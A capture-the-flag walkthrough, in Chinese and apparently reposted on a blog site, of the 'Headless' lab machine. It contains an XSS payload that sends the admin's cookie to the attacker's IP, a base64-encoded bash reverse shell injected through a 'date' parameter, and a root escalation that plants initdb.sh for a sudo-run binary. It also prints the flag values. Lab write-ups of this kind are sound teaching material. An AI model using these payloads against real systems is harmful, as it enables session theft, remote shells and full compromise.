[Meachines][Easy]Headless

2024-04-19 02:04
文章标签 easy headless meachines

本文主要是介绍[Meachines][Easy]Headless,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Tools

https://github.com/MartinxMax/MDOG

针对XXS攻击

image.png

Main

$ nmap -sC -sV 10.10.11.8 --min-rate 1000

image.png

类似于留言板

image.png

通过目录扫描,发现一个仪表盘

$ gobuster dir -u "http://10.10.11.8:5000" -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt

image.png

image.png

回到留言板

image.png

说IP已经被记录,那么我们尝试在数据包中的User-Agent字段注入js语句

管理员不过一会就中xss了

image.png

运行,复制payload,burp重放

<img src=1 onerror=window.open("http://10.10.14.25:9999/?id="+document.cookie)>

image.png

修改cookie

image.png

http://10.10.11.8:5000/dashboard

image.png

存在RCE

image.png

$ echo "bash -i >& /dev/tcp/10.10.14.25/10032 0>&1"|base64

date=;echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==|base64%20-d>/tmp/shell.sh;chmod%20777%20/tmp/shell.sh;ls%20-al%20/tmp/shell.sh;echo%20'---------------';cat%20/tmp/shell.sh

这里面的+号需要进行url编码

image.png

date=;/bin/bash%20/tmp/shell.sh

image.png

User Flag

cat /home/dvir/user.txt

image.png

e2576236e9f7ebc8b857de1f2c10fe63

Root Flag

$ sudo -l

image.png

$ strings /usr/bin/syscheck

image.png

这个initdb.sh文件在本服务器是没有的,可以利用它

有趣的是./是一个相对路径
在app目录下执行/usr/bin/syscheck后,里的./initdb.sh指向的是app目录下的initdb.sh,而不是指向/usr/bin/下的initdb.sh

知识点:
查看当前用户在当前主机上的 sudo 权限,所列出的文件必须加sudo运行才是高权限

image.png

(~app)$ echo '/bin/bash'>initdb.sh;chomod +x initdb.sh;sudo /usr/bin/syscheck

成功提权

image.png

image.png

927acc092719872f616c53b4a0e910a9

Another

海外的大牛wp是

(~app)$ echo "chmod u+s /bin/bash" >initdb.sh;chmod +x initdb.sh;sudo /usr/bin/syscheck;/bin/bash -p

在普通用户下是无法给/bin/bash加SUID的

image.png

这里大牛的思路是利用sudo /usr/bin/syscheck执行的高权限执行initdb.sh,然后给/bin/bash添加一个SUID,这将意味着任意用户使用-p参数 privileged mode(特权模式)调用/bin/bash时候都将以root权限身份运行

image.png

我们再次返回到RCE点,发现的确如此

date=;/bin/bash%20-c%20-p%20"whoami"

image.png

这篇关于[Meachines][Easy]Headless的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/916362

相关文章

LibSVM学习(六)——easy.py和grid.py的使用

我们在“LibSVM学习(一)”中,讲到libSVM有一个tools文件夹,里面包含有四个python文件,是用来对参数优选的。其中,常用到的是easy.py和grid.py两个文件。其实,网上也有相应的说明,但很不系统,下面结合本人的经验,对使用方法做个说明。        这两个文件都要用python(可以在http://www.python.org上下载到,需要安装)和绘图工具gnup

11991 - Easy Problem from Rujia Liu?

题意: 输入一串整型数列,再输入两个数k,v,输出第k个v的序号。不存在则输出0,如第一个样例 8 41 3 2 2 4 3 2 11 3 //第1个3,序号为2,输出22 4 //第2个4,不存在,输出03 2 //第3个2,序号为7,输出74 2 思路: struct num {

【开发工具】开发过程中,怎么通过Easy JavaDoc快速生成注释。

文章目录 引言什么是Easy JavaDoc?Easy JavaDoc用来干什么?如何使用Easy JavaDoc?安装Easy JavaDoc配置Easy JavaDoc使用Easy JavaDoc生成注释 Easy JavaDoc与IDEA自带注释的区别IDEA自带注释Easy JavaDoc Easy JavaDoc的优缺点优点缺点 步骤 1:打开设置步骤 2:找到Easy JavaD

easy简化封装

//confirm function Confirm(msg, control) {$.messager.confirm('确认', msg, function (r) {if (r) {eval(control.toString().slice(11));}});return false;}//loadfunction Load() {$("<div class=\"datagrid-ma

Easy Voice Toolkit - 简易语音工具箱,一款强大的语音识别、转录、转换工具 本地一键整合包下载

Easy Voice Toolkit 是一个基于开源语音项目实现的简易语音工具箱,提供了包括语音模型训练在内的多种自动化音频工具,集成了GUI,无需配置,解压即用。 工具箱包括 audio-slicer、VoiceprintRecognition、whisper、SRT - to - CSV - and - audio - split、vits 和 GPT - SoVITS 等。这些优秀

树莓派 4 使用 WiFi 从 SSD Headless 启动

树莓派 4 使用 WiFi 从 SSD Headless 启动 树莓派已经默认支持从 SSD 启动,可以根据官方提供的工具初始化树莓派系统并启动;尝试通过安装 Ubuntu Server,不使用网线、显示器、键盘等,从 SSD 直接启动 依赖 树莓派 4MacSSD 安装 Ubuntu Server 1. 安装 Raspberry Pi Imager Raspberry Pi Imag

[Meachines] [Medium] Lightweight LDAP密码嗅探+TRP00F 自动化权限提升+openssl 权限提升

信息收集 IP AddressOpening Ports10.10.10.119TCP:22,80,389 $ nmap -p- 10.10.10.119 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4 (protocol 2.0)| ssh-hostkey:|

[Meachines] [Medium] Bitlab 标签自动填充登录+GitLab+Docker横向+Postgresql+逆向工程

信息收集 IP AddressOpening Ports10.10.10.114TCP:22,80 $ nmap -p- 10.10.10.114 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; pr

easy_spring_boot Java 后端开发框架

Easy SpringBoot 基于 Java 17、SpringBoot 3.3.2 开发的后端框架,集成 MyBits-Plus、SpringDoc、SpringSecurity 等插件,旨在提供一个高效、易用的后端开发环境。该框架通过清晰的目录结构和模块化设计,帮助开发者快速构建和部署后端服务。 一、目录结构说明 project-root/│├─ backend/ # 后端项

[Meachines] [Easy] Safe BOF+ROP链+.data节区注入BOF+函数跳转BOF+KeePass密码管理器密码破译

信息收集 IP AddressOpening Ports10.10.10.147TCP:22,80,1337 $ nmap -p- 10.10.10.147 --min-rate 1000 -sC -sV PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol